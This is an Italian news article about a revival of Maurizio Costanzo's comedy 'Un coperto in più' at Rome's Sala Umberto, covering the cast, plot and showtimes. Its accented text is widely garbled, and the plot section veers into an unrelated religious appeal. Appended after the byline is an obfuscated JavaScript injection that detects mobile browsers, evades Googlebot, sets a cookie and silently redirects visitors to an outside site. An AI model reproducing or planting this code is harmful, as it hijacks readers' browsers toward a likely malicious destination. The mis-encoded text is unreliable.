News

‘Un coperto in piA?’ di Maurizio Costanzo, torna in scena al Sala Umberto di Roma

Scriveva Giorgio Prosperi su Il Tempo nel 1972 al debutto di questa commedia a�� scritta da Maurizio Costanzo a�� che vide la riunione dei fratelli GiuffrA? sul palcoscenico:a�?Date a degli attori la libertA� di esprimersi non dico nella loro lingua, ma con toni, accenti, colori che sono propri, anzichA� nella��astratta lingua delle accademie e dei teatri, ed ecco tutto si illumina, tutto diventa veritA� e materia da��esperienza, anche una commedia dalle geometrie simmetriche comeUn coperto in piA? di Maurizio Costanzoa��a�?

Lo spettacolo fu uno straordinario successo, tutta la critica fu unanime nel riconoscere il progetto teatrale fra quelli che sarebbero entrati di diritto negli annali del Teatro Italiano.

A riproporlo sul palcoscenico della Sala Umberto, da mercoledA� 16/09 a domenica 27/ 09, ci pensa Gianfelice Imparato, grande attore di teatro e di cinema. DirigerA� con ironia e stile due interpreti molto amati e apprezzati dal pubblico: Maurizio Micheli e Vito. Dopo una carriera che li ha visti impegnati in modo eclettico con cinema, TV, scrittura, il teatro resta indubbiamente la loro grande passione.

La trama
Un ricco gioielliere vive con sua moglie una vita coniugale apparentemente tranquilla e felice. La moglie A? una donna bella e sensibile, piena di charme, insomma una donna eccezionale, tanto eccezionale che non esiste piA? o forse A? scomparsa tempo prima o forse non A? mai esistita. Un giorno arriva un piccolo imbroglione che campa alla giornata tentando di rifilare gioielli falsi ed A? proprio nel tentativo di vendere un anello che si ritrova ad entrare in questa incredibile famiglia dove la padrona di casa non esiste, ma si inizia un vero e proprio rapporto a tre assolutamente reale con tanto di dialoghi, domande e risposte fatte ad una sedia vuota. Ea�� un Godot al femminile, uno a�?chercez la femmea�? senza soluzione, una struttura pinteriana, ma anche una sinfonia di Rhomer.

Cosa vera A? che tutti noi cerchiamo la “femme” che puA? essere una carriera, una vita differente o alternativa, felicitA� o mille altre cose ma ahimA?, passiamo la vita a rincorrerla e lei A? sempre un millimetro piA? in lA� oltre la nostra portata. E allora proviamo tutto quello che ci annebbia/stordisce/fa dimenticare pur di far finta, davanti agli altri, che la��abbiamo trovataa�� e le parliamo mentre invece stiamo parlando al nulla. Apparire piuttosto che essere. Che maledizione!

Forse dobbiamo cercare differentemente e in posti differenti. Siamo bravissimi nella��arte del sapersi arrangiare. “Secondo me” o “I did it my way” A? la dicotomia generale ma distruttiva. Abbiamo bisogno di qualcuno che sa come ricrearci. PerchA� ciascuno di noi A? UNICO. Basta con i professionisti. Allora siccome siamo bravissimi a parlare da soli ma al nulla perchA� non prendiamo il coraggio a due mani e parliamo a Lui dicendogli tutto, senza omettere nulla sicuramente la��unica vera e nuova sensazione mai provata prima in tutta la tua vita? Lui risponde, la��ha sempre fatto. Non troverai la a�?femmea�? troverai te stesso, il vero te, completo e capolavoro della��universo. Lo sai perchA� posso dirti questo? Ea�� successo a me.

Sala Umberto – Via della Mercede 50 Roma – dal lunedA� al sabato ore 21 mercoledA� ore 17, sabato 17 e 21 domenica ore 17 -A� Prezzi da 32a�� a 23a��

Gabriele Crocianivar _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}